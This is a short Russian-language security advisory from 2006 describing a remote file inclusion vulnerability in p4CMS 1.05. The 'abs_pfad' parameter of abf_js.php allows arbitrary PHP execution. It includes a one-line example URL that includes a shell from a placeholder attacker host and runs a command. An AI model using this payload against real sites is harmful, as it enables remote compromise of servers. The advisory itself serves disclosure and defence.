Дата публикации: | 13.09.2006 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 2445 |
Опасность: | Высокая |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | p4CMS 1.x |
Уязвимые версии: p4CMS 1.05
Описание: Злоумышленник может скомпрометировать уязвимую систему. Сценарий abf_js.php не достаточно фильтрует данные в параметре "abs_pfad"" перед использованием для включения файлов. В результате можно выполнить произвольный PHP код, включая файлы с локальных или удаленных источников. Пример/Эксплоит: http://sitename.com/[Script Path]/abf_js.php?abs_pfad=http://SHELLURL.COM?&cmd=id Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |